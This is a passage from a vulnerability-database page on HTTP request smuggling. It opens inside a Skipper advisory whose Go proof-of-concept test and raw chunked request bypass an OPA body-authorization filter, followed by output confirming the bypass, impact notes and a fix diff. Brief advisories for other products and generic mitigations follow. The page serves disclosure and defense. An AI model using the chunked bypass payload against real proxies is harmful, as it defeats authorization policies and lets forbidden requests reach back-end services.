\"test\"\n\t\t},\n\t\t\"plugins\": {\n\t\t\t\"envoy_ext_authz_grpc\": {\n\t\t\t\t\"path\": \"envoy/authz/allow\",\n\t\t\t\t\"dry-run\": false\n\t\t\t}\n\t\t}\n\t}`, opaControlPlane.URL())\n\n\topts := []func(*openpolicyagent.OpenPolicyAgentInstanceConfig) error{\n\t\topenpolicyagent.WithConfigTemplate(config),\n\t}\n\n\topaFactory, err := openpolicyagent.NewOpenPolicyAgentRegistry(\n\t\topenpolicyagent.WithTracer(tracingtest.NewTracer()),\n\t\topenpolicyagent.WithOpenPolicyAgentInstanceConfig(opts...),\n\t)\n\tif err != nil {\n\t\tt.Fatalf(\"registry: %v\", err)\n\t}\n\n\tfr := make(filters.Registry)\n\tfr.Register(NewOpaAuthorizeRequestWithBodySpec(opaFactory))\n\tfr.Register(builtin.NewSetPath())\n\n\t// Route: every request runs opaAuthorizeRequestWithBody, then proxies to upstream.\n\tr := eskip.MustParse(fmt.Sprintf(\n\t\t`* -\u003e opaAuthorizeRequestWithBody(\"test\") -\u003e \"%s\"`, upstream.URL))\n\n\tproxy := proxytest.New(fr, r...)\n\tdefer proxy.Close()\n\n\thost := strings.TrimPrefix(proxy.URL, \"http://\")\n\n\ttype tc struct {\n\t\tname       string\n\t\twire       string\n\t\twantStatus int\n\t\twantUpstrm bool // whether upstream is expected to be reached\n\t}\n\n\tcases := []tc{\n\t\t{\n\t\t\tname: \"1: Content-Length benign body -\u003e 200 ALLOW\",\n\t\t\twire: \"POST /priv HTTP/1.1\\r\\n\" +\n\t\t\t\t\"Host: \" + host + \"\\r\\n\" +\n\t\t\t\t\"Content-Type: application/json\\r\\n\" +\n\t\t\t\t\"Connection: close\\r\\n\" +\n\t\t\t\t\"Content-Length: 15\\r\\n\" +\n\t\t\t\t\"\\r\\n\" +\n\t\t\t\t`{\"admin\":false}`,\n\t\t\twantStatus: 200,\n\t\t\twantUpstrm: true,\n\t\t},\n\t\t{\n\t\t\tname: \"2: Content-Length admin body -\u003e 403 DENY (negative control)\",\n\t\t\twire: \"POST /priv HTTP/1.1\\r\\n\" +\n\t\t\t\t\"Host: \" + host + \"\\r\\n\" +\n\t\t\t\t\"Content-Type: application/json\\r\\n\" +\n\t\t\t\t\"Connection: close\\r\\n\" +\n\t\t\t\t\"Content-Length: 14\\r\\n\" +\n\t\t\t\t\"\\r\\n\" +\n\t\t\t\t`{\"admin\":true}`,\n\t\t\twantStatus: 403,\n\t\t\twantUpstrm: false,\n\t\t},\n\t\t{\n\t\t\tname: \"3: chunked admin body -\u003e EXPECTED 403, BUG 200 (bypass)\",\n\t\t\twire: \"POST /priv HTTP/1.1\\r\\n\" +\n\t\t\t\t\"Host: \" + host + \"\\r\\n\" +\n\t\t\t\t\"Content-Type: application/json\\r\\n\" +\n\t\t\t\t\"Connection: close\\r\\n\" +\n\t\t\t\t\"Transfer-Encoding: chunked\\r\\n\" +\n\t\t\t\t\"\\r\\n\" +\n\t\t\t\t\"e\\r\\n\" +\n\t\t\t\t`{\"admin\":true}` + \"\\r\\n\" +\n\t\t\t\t\"0\\r\\n\" +\n\t\t\t\t\"\\r\\n\",\n\t\t\twantStatus: 200, // documents the BUG: should be 403 but the bypass yields 200\n\t\t\twantUpstrm: true,\n\t\t},\n\t}\n\n\tfor _, c := range cases {\n\t\tmu.Lock()\n\t\tbefore := len(upstreamBodies)\n\t\tmu.Unlock()\n\n\t\tresp := rawRequest(t, host, c.wire)\n\n\t\tmu.Lock()\n\t\treached := len(upstreamBodies) \u003e before\n\t\tvar lastBody string\n\t\tif reached {\n\t\t\tlastBody = upstreamBodies[len(upstreamBodies)-1]\n\t\t}\n\t\tmu.Unlock()\n\n\t\tt.Logf(\"[%s] status=%d upstreamReached=%v upstreamBody=%q\",\n\t\t\tc.name, resp.StatusCode, reached, lastBody)\n\n\t\tif resp.StatusCode != c.wantStatus {\n\t\t\tt.Errorf(\"[%s] status = %d, want %d\", c.name, resp.StatusCode, c.wantStatus)\n\t\t}\n\t\tif reached != c.wantUpstrm {\n\t\t\tt.Errorf(\"[%s] upstreamReached = %v, want %v\", c.name, reached, c.wantUpstrm)\n\t\t}\n\t}\n\n\t// Explicit bypass assertion: the chunked admin body MUST have reached\n\t// upstream verbatim despite the deny policy.\n\tmu.Lock()\n\tdefer mu.Unlock()\n\tbypassed := false\n\tfor _, b := range upstreamBodies {\n\t\tif b == `{\"admin\":true}` {\n\t\t\tbypassed = true\n\t\t}\n\t}\n\tif bypassed {\n\t\tt.Logf(\"BYPASS CONFIRMED: upstream received {\\\"admin\\\":true} despite deny policy (OPA saw empty parsed_body for the chunked request)\")\n\t} else {\n\t\tt.Errorf(\"expected the chunked admin body to reach upstream (bypass), but it did not\")\n\t}\n}\n```\n\nThe three requests cover:\n\n| # | Wire framing | Body | Expected | Got |\n|---|--------------|------|----------|-----|\n| 1 | `Content-Length: 15` | `{\"admin\":false}` | 200 ALLOW | 200 (upstream reached) |\n| 2 | `Content-Length: 14` | `{\"admin\":true}` | 403 DENY  | 403 (OPA blocked) |\n| 3 | `Transfer-Encoding: chunked` | `{\"admin\":true}` | 403 DENY | **200 ALLOW (bypass)** |\n\nTest 3 wire bytes: `POST /priv HTTP/1.1\\r\\nHost: ...\\r\\nContent-Type:\napplication/json\\r\\nConnection: close\\r\\nTransfer-Encoding:\nchunked\\r\\n\\r\\ne\\r\\n{\"admin\":true}\\r\\n0\\r\\n\\r\\n`.\n\nRun command and verbatim output (`go version go1.26.3 darwin/arm64`,\n`github.com/open-policy-agent/opa v1.14.1` as pinned by skipper `v0.26.8`):\n\n```\n$ go test -v -run TestSkipperOPABypassPoC -count=1 ./filters/openpolicyagent/opaauthorizerequest/\n=== RUN   TestSkipperOPABypassPoC\n2026/05/28 14:43:47 route settings, reset, route: : * -\u003e opaAuthorizeRequestWithBody(\"test\") -\u003e \"http://127.0.0.1:57343\"\n2026/05/28 14:43:47 route settings received, id: 1\ntime=\"2026-05-28T14:43:47+08:00\" level=info msg=\"Starting OPA instance...\" bundle-name=test\ntime=\"2026-05-28T14:43:47+08:00\" level=info msg=\"OPA instance health updated: healthy=false status=map[bundle:{NOT_READY \\\"\\\"} discovery:{NOT_READY \\\"\\\"} envoy_ext_authz_grpc:{OK \\\"\\\"}]\" bundle-name=test\ntime=\"2026-05-28T14:43:47+08:00\" level=info msg=\"OPA instance health updated: healthy=false status=map[bundle:{NOT_READY \\\"\\\"} discovery:{OK \\\"\\\"} envoy_ext_authz_grpc:{OK \\\"\\\"}]\" bundle-name=test\ntime=\"2026-05-28T14:43:47+08:00\" level=info msg=\"OPA instance health updated: healthy=true status=map[bundle:{OK \\\"\\\"} discovery:{OK \\\"\\\"} envoy_ext_authz_grpc:{OK \\\"\\\"}]\" bundle-name=test\n2026/05/28 14:43:47 route settings applied, id: 1\n    poc_test.go:211: [1: Content-Length benign body -\u003e 200 ALLOW] status=200 upstreamReached=true upstreamBody=\"{\\\"admin\\\":false}\"\n    poc_test.go:211: [2: Content-Length admin body -\u003e 403 DENY (negative control)] status=403 upstreamReached=false upstreamBody=\"\"\n    poc_test.go:211: [3: chunked admin body -\u003e EXPECTED 403, BUG 200 (bypass)] status=200 upstreamReached=true upstreamBody=\"{\\\"admin\\\":true}\"\n    poc_test.go:233: BYPASS CONFIRMED: upstream received {\"admin\":true} despite deny policy (OPA saw empty parsed_body for the chunked request)\n--- PASS: TestSkipperOPABypassPoC (0.11s)\nPASS\nok  \tgithub.com/zalando/skipper/filters/openpolicyagent/opaauthorizerequest\t1.897s\n```\n\nTest 1 (Content-Length, benign body) is allowed and reaches upstream with\n`{\"admin\":false}`. Test 2 is the negative control: the same `{\"admin\":true}`\npayload sent with a `Content-Length` header is correctly DENIED (HTTP 403)\nand never reaches the upstream, proving the policy itself is sound. Test 3\nsends the identical forbidden body as `Transfer-Encoding: chunked`; OPA\nevaluates an empty `parsed_body`, the deny rule fails open, the proxy\nreturns HTTP 200, and the upstream receives the full `{\"admin\":true}`\npayload that the policy was configured to block.\n\n### Impact\n\nOperators relying on `opaAuthorizeRequestWithBody` for body-content\nauthorization are silently downgraded to header/path-only authorization\nfor any client that emits chunked or HTTP/2 requests. Concrete\nproduction patterns affected:\n\n- \"Deny when body contains admin/privileged field\" guardrails for\n  multi-tenant or role-stratified APIs;\n- \"Deny when content-moderation flag is present\" filters in front of\n  user-content endpoints;\n- \"Deny when payload schema version is forbidden\" gates for\n  deprecated-API shutdown;\n- \"Deny when SQL/command-injection-shaped string is present\" generic\n  body validators.\n\nIn every case the chunked attack arrives with the forbidden body\nintact, OPA evaluates against an empty document, the policy fails open,\nand the upstream receives the attacker payload that the deployment was\nspecifically configured to block. There is no log signal in OPA\u0027s\ndecision log distinguishing \"body was empty\" from \"client did not send\na body\".\n\nNote that the OPA decision log will record the request as ALLOWED with\n`raw_body` length 0, which complicates post-hoc forensic detection. The\nupstream\u0027s request log will show the full body, producing a confusing\nallow/observed asymmetry across systems.\n\nCVSS 3.1: `AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N` (8.5 HIGH). Scope is\nChanged because the failure crosses the trust boundary between the\nauthorization filter and the upstream service.\n\n### Suggested fix\n\n`filters/openpolicyagent/openpolicyagent.go`:\n\n```diff\n func (opa *OpenPolicyAgentInstance) ExtractHttpBodyOptionally(req *http.Request) (io.ReadCloser, []byte, func(), error) {\n \tbody := req.Body\n \n+\t// `req.ContentLength == -1` is set by net/http when the client uses\n+\t// Transfer-Encoding: chunked (HTTP/1.1) or omits content-length in\n+\t// HTTP/2 framing. Treat unknown-length bodies as up-to-max-bytes and\n+\t// drive fillBuffer with the policy cap instead of the negative\n+\t// sentinel, otherwise the fillBuffer loop short-circuits on its\n+\t// `len \u003c expectedSize` predicate and OPA evaluates an empty body.\n+\texpectedSize := req.ContentLength\n+\tif expectedSize \u003c 0 {\n+\t\texpectedSize = opa.maxBodyBytes\n+\t}\n+\n \tif body != nil \u0026\u0026 !opa.EnvoyPluginConfig().SkipRequestBodyParse \u0026\u0026\n-\t\treq.ContentLength \u003c= int64(opa.maxBodyBytes) {\n+\t\texpectedSize \u003c= int64(opa.maxBodyBytes) {\n \n \t\twrapper := newBufferedBodyReader(req.Body, opa.maxBodyBytes, opa.bodyReadBufferSize)\n \n-\t\trequestedBodyBytes := bodyUpperBound(req.ContentLength, opa.maxBodyBytes)\n+\t\trequestedBodyBytes := bodyUpperBound(expectedSize, opa.maxBodyBytes)\n \t\tif !opa.registry.maxMemoryBodyParsingSem.TryAcquire(requestedBodyBytes) {\n \t\t\treturn req.Body, nil, func() {}, ErrTotalBodyBytesExceeded\n \t\t}\n \n-\t\trawBody, err := wrapper.fillBuffer(req.ContentLength)\n+\t\trawBody, err := wrapper.fillBuffer(expectedSize)\n \t\treturn wrapper, rawBody, func() { opa.registry.maxMemoryBodyParsingSem.Release(requestedBodyBytes) }, err\n \t}\n \n \treturn req.Body, nil, func() {}, nil\n }\n```\n\nAfter the fix, `fillBuffer(maxBodyBytes)` reads chunked bodies up to\nthe configured cap. If the body exceeds the cap, the existing `Read()`\npath already returns the wrapped reader for downstream consumption,\nmatching the documented behaviour for over-cap requests today; the\noperator-configured `maxRequestBodyBytes` continues to be the single\nknob governing memory allocation.\n\nA regression test `TestOpaAuthorizeRequestWithBody_ChunkedBodyIsParsed`\nin `filters/openpolicyagent/opaauthorizerequest/opaauthorizerequest_test.go`\nshould send a `Transfer-Encoding: chunked` request matching a\nblacklist policy and assert HTTP 403, and a same-payload Content-Length\nrequest to confirm parity.\n\n### Credit\n\nReported by tonghuaroot.",
  "id": "GHSA-659f-rgp5-w4wf",
  "modified": "2026-07-08T20:23:44Z",
  "published": "2026-07-08T20:23:44Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/zalando/skipper/security/advisories/GHSA-659f-rgp5-w4wf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/zalando/skipper"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N/E:U/RL:O",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Skipper: opaAuthorizeRequestWithBody filter bypasses OPA policy on Transfer-Encoding \u2014 chunked / HTTP/2 requests"
}

GHSA-665V-8RGP-XWX8

Vulnerability from github – Published: 2022-05-13 01:01 – Updated: 2022-05-13 01:01
VLAI
Details

In the web management interface in Foscam C1 Indoor HD cameras with application firmware 2.52.2.37, a specially crafted HTTP request can allow for a user to inject arbitrary characters in the pureftpd.passwd file during a username change, which in turn allows for bypassing chroot restrictions in the FTP server. An attacker can simply send an HTTP request to the device to trigger this vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-2850"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444",
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-06-29T17:29:00Z",
    "severity": "HIGH"
  },
  "details": "In the web management interface in Foscam C1 Indoor HD cameras with application firmware 2.52.2.37, a specially crafted HTTP request can allow for a user to inject arbitrary characters in the pureftpd.passwd file during a username change, which in turn allows for bypassing chroot restrictions in the FTP server. An attacker can simply send an HTTP request to the device to trigger this vulnerability.",
  "id": "GHSA-665v-8rgp-xwx8",
  "modified": "2022-05-13T01:01:20Z",
  "published": "2022-05-13T01:01:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-2850"
    },
    {
      "type": "WEB",
      "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2017-0352"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/99184"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-666M-W6MW-M583

Vulnerability from github – Published: 2025-03-26 15:32 – Updated: 2025-03-26 15:32
VLAI
Details

IBM Cognos Controller 11.0.0 through 11.1.0 is vulnerable to a Client-Side Desync (CSD) attack where an attacker could exploit a desynchronized browser connection that could lead to further cross-site scripting (XSS) attacks.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-39163"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-26T14:15:20Z",
    "severity": "MODERATE"
  },
  "details": "IBM Cognos Controller 11.0.0 through 11.1.0 is vulnerable to a Client-Side Desync (CSD) attack where an attacker could exploit a desynchronized browser connection that could lead to further cross-site scripting (XSS) attacks.",
  "id": "GHSA-666m-w6mw-m583",
  "modified": "2025-03-26T15:32:39Z",
  "published": "2025-03-26T15:32:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-39163"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7192746"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-67RR-84XM-4C7R

Vulnerability from github – Published: 2025-07-03 21:14 – Updated: 2025-07-03 21:49
VLAI
Summary
Next.JS vulnerability can lead to DoS via cache poisoning
Details

Summary

A vulnerability affecting Next.js has been addressed. It impacted versions 15.0.4 through 15.1.8 and involved a cache poisoning bug leading to a Denial of Service (DoS) condition.

Under certain conditions, this issue may allow a HTTP 204 response to be cached for static pages, leading to the 204 response being served to all users attempting to access the page

More details: CVE-2025-49826

Credits

  • Allam Rachid zhero;
  • Allam Yasser (inzo)
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "next"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "15.0.4-canary.51"
            },
            {
              "fixed": "15.1.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-49826"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-03T21:14:48Z",
    "nvd_published_at": "2025-07-03T21:15:27Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA vulnerability affecting Next.js has been addressed. It impacted versions 15.0.4 through 15.1.8 and involved a cache poisoning bug leading to a Denial of Service (DoS) condition.\n\nUnder certain conditions, this issue may allow a HTTP 204 response to be cached for static pages, leading to the 204 response being served to all users attempting to access the page\n\nMore details: [CVE-2025-49826](https://vercel.com/changelog/cve-2025-49826)\n\n## Credits\n- Allam Rachid [zhero;](https://zhero-web-sec.github.io/research-and-things/)\n- Allam Yasser (inzo)",
  "id": "GHSA-67rr-84xm-4c7r",
  "modified": "2025-07-03T21:49:52Z",
  "published": "2025-07-03T21:14:48Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vercel/next.js/security/advisories/GHSA-67rr-84xm-4c7r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-49826"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vercel/next.js/commit/16bfce64ef2157f2c1dfedcfdb7771bc63103fd2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vercel/next.js/commit/a15b974ed707d63ad4da5b74c1441f5b7b120e93"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vercel/next.js"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vercel/next.js/releases/tag/v15.1.8"
    },
    {
      "type": "WEB",
      "url": "https://vercel.com/changelog/cve-2025-49826"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Next.JS vulnerability can lead to DoS via cache poisoning "
}

GHSA-67VW-JJGW-XCVQ

Vulnerability from github – Published: 2026-01-26 12:30 – Updated: 2026-01-26 12:30
VLAI
Details

Illegal HTTP request traffic vulnerability (CL.0) in Altitude Communication Server, caused by inconsistent analysis of multiple HTTP requests over a single Keep-Alive connection using Content-Length headers. This can cause a desynchronization of requests between frontend and backend servers, which could allow request hiding, cache poisoning or security bypass.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-41082"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-26T10:16:05Z",
    "severity": "MODERATE"
  },
  "details": "Illegal HTTP request traffic vulnerability (CL.0) in Altitude Communication Server, caused by inconsistent analysis of multiple HTTP requests over a single Keep-Alive connection using  Content-Length headers. This can cause a desynchronization of requests between frontend and backend servers, which could allow request hiding, cache poisoning or security bypass.",
  "id": "GHSA-67vw-jjgw-xcvq",
  "modified": "2026-01-26T12:30:28Z",
  "published": "2026-01-26T12:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41082"
    },
    {
      "type": "WEB",
      "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-altitude-communication-server"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-68QC-X6C7-F66C

Vulnerability from github – Published: 2022-05-17 00:24 – Updated: 2025-04-20 03:47
VLAI
Details

An active network attacker (MiTM) can achieve remote code execution on a machine that runs IKARUS Anti Virus 2.16.7. IKARUS AV for Windows uses cleartext HTTP for updates along with a CRC32 checksum and an update value for verification of the downloaded files. The attacker first forces the client to initiate an update transaction by modifying an update field within an HTTP 200 response, so that it refers to a nonexistent update. The attacker then modifies the HTTP 404 response so that it specifies a successfully found update, with a Trojan horse executable file (e.g., guardxup.exe) and the correct CRC32 checksum for that file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-15643"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-10-19T22:29:00Z",
    "severity": "HIGH"
  },
  "details": "An active network attacker (MiTM) can achieve remote code execution on a machine that runs IKARUS Anti Virus 2.16.7. IKARUS AV for Windows uses cleartext HTTP for updates along with a CRC32 checksum and an update value for verification of the downloaded files. The attacker first forces the client to initiate an update transaction by modifying an update field within an HTTP 200 response, so that it refers to a nonexistent update. The attacker then modifies the HTTP 404 response so that it specifies a successfully found update, with a Trojan horse executable file (e.g., guardxup.exe) and the correct CRC32 checksum for that file.",
  "id": "GHSA-68qc-x6c7-f66c",
  "modified": "2025-04-20T03:47:17Z",
  "published": "2022-05-17T00:24:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15643"
    },
    {
      "type": "WEB",
      "url": "https://blogs.securiteam.com/index.php/archives/3485"
    },
    {
      "type": "WEB",
      "url": "https://www.ikarussecurity.com/about-ikarus/security-blog/vulnerability-in-windows-antivirus-products-ik-sa-2017-0001"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-68QF-XHQ3-9QJ5

Vulnerability from github – Published: 2024-07-26 12:35 – Updated: 2025-11-04 00:30
VLAI
Details

Apache Traffic Server accepts characters that are not allowed for HTTP field names and forwards malformed requests to origin servers. This can be utilized for request smuggling and may also lead cache poisoning if the origin servers are vulnerable.

This issue affects Apache Traffic Server: from 8.0.0 through 8.1.10, from 9.0.0 through 9.2.4.

Users are recommended to upgrade to version 8.1.11 or 9.2.5, which fixes the issue.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-38522"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-444",
      "CWE-86"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-26T10:15:01Z",
    "severity": "HIGH"
  },
  "details": "Apache Traffic Server accepts characters that are not allowed for HTTP field names and forwards malformed requests to origin servers. This can be utilized for request smuggling and may also lead cache poisoning if the origin servers are vulnerable.\n\nThis issue affects Apache Traffic Server: from 8.0.0 through 8.1.10, from 9.0.0 through 9.2.4.\n\nUsers are recommended to upgrade to version 8.1.11 or 9.2.5, which fixes the issue.",
  "id": "GHSA-68qf-xhq3-9qj5",
  "modified": "2025-11-04T00:30:58Z",
  "published": "2024-07-26T12:35:48Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38522"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread/c4mcmpblgl8kkmyt56t23543gp8v56m0"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00040.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-68X6-P7V3-XXQM

Vulnerability from github – Published: 2022-05-24 19:20 – Updated: 2022-05-24 19:20
VLAI
Details

Belledonne Belle-sip before 5.0.20 can crash applications such as Linphone via an invalid From header (request URI without a parameter) in an unauthenticated SIP message, a different issue than CVE-2021-33056.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-43610"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-11-12T22:15:00Z",
    "severity": "HIGH"
  },
  "details": "Belledonne Belle-sip before 5.0.20 can crash applications such as Linphone via an invalid From header (request URI without a parameter) in an unauthenticated SIP message, a different issue than CVE-2021-33056.",
  "id": "GHSA-68x6-p7v3-xxqm",
  "modified": "2022-05-24T19:20:28Z",
  "published": "2022-05-24T19:20:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43610"
    },
    {
      "type": "WEB",
      "url": "https://github.com/BelledonneCommunications/belle-sip/commit/d3f0651531e45e91c2e60f3a16a8b612802e5d2d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/BelledonneCommunications/belle-sip/compare/5.0.18...5.0.20"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-68XG-GQQM-VGJ8

Vulnerability from github – Published: 2023-08-18 21:50 – Updated: 2023-08-24 22:34
VLAI
Summary
Puma HTTP Request/Response Smuggling vulnerability
Details

Impact

Prior to version 6.3.1, puma exhibited incorrect behavior when parsing chunked transfer encoding bodies and zero-length Content-Length headers in a way that allowed HTTP request smuggling.

The following vulnerabilities are addressed by this advisory:

  • Incorrect parsing of trailing fields in chunked transfer encoding bodies
  • Parsing of blank/zero-length Content-Length headers

Patches

The vulnerability has been fixed in 6.3.1 and 5.6.7.

Workarounds

No known workarounds.

References

HTTP Request Smuggling

For more information

If you have any questions or comments about this advisory:

Open an issue in Puma See our security policy

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "puma"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.6.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "RubyGems",
        "name": "puma"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0"
            },
            {
              "fixed": "6.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-40175"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-444"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-08-18T21:50:05Z",
    "nvd_published_at": "2023-08-18T22:15:11Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\nPrior to version 6.3.1, puma exhibited incorrect behavior when parsing chunked transfer encoding bodies and zero-length Content-Length headers in a way that allowed HTTP request smuggling.\n\nThe following vulnerabilities are addressed by this advisory:\n\n* Incorrect parsing of trailing fields in chunked transfer encoding bodies\n* Parsing of blank/zero-length Content-Length headers\n\n### Patches\nThe vulnerability has been fixed in 6.3.1 and 5.6.7.\n\n### Workarounds\nNo known workarounds.\n\n### References\n[HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)\n\n### For more information\nIf you have any questions or comments about this advisory:\n\nOpen an issue in [Puma](https://github.com/puma/puma)\nSee our [security policy](https://github.com/puma/puma/security/policy)\n",
  "id": "GHSA-68xg-gqqm-vgj8",
  "modified": "2023-08-24T22:34:11Z",
  "published": "2023-08-18T21:50:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/puma/puma/security/advisories/GHSA-68xg-gqqm-vgj8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40175"
    },
    {
      "type": "WEB",
      "url": "https://github.com/puma/puma/commit/690155e7d644b80eeef0a6094f9826ee41f1080a"
    },
    {
      "type": "WEB",
      "url": "https://github.com/puma/puma/commit/7405a219801dcebc0ad6e0aa108d4319ca23f662"
    },
    {
      "type": "WEB",
      "url": "https://github.com/puma/puma/commit/ed0f2f94b56982c687452504b95d5f1fbbe3eed1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/puma/puma"
    },
    {
      "type": "WEB",
      "url": "https://github.com/puma/puma/releases/tag/v5.6.7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/puma/puma/releases/tag/v6.3.1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puma/CVE-2023-40175.yml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Puma HTTP Request/Response Smuggling vulnerability"
}

Mitigation
Implementation

Use a web server that employs a strict HTTP parsing procedure, such as Apache [REF-433].

Mitigation
Implementation

Use only SSL communication.

Mitigation
Implementation

Terminate the client session after each request.

Mitigation
System Configuration

Turn all pages to non-cacheable.

CAPEC-273: HTTP Response Smuggling

An adversary manipulates and injects malicious content in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., server).

See CanPrecede relationships for possible consequences.

CAPEC-33: HTTP Request Smuggling

An adversary abuses the flexibility and discrepancies in the parsing and interpretation of HTTP Request messages using various HTTP headers, request-line and body parameters as well as message sizes (denoted by the end of message signaled by a given HTTP header) by different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) to secretly send unauthorized and malicious HTTP requests to a back-end HTTP agent (e.g., web server).

See CanPrecede relationships for possible consequences.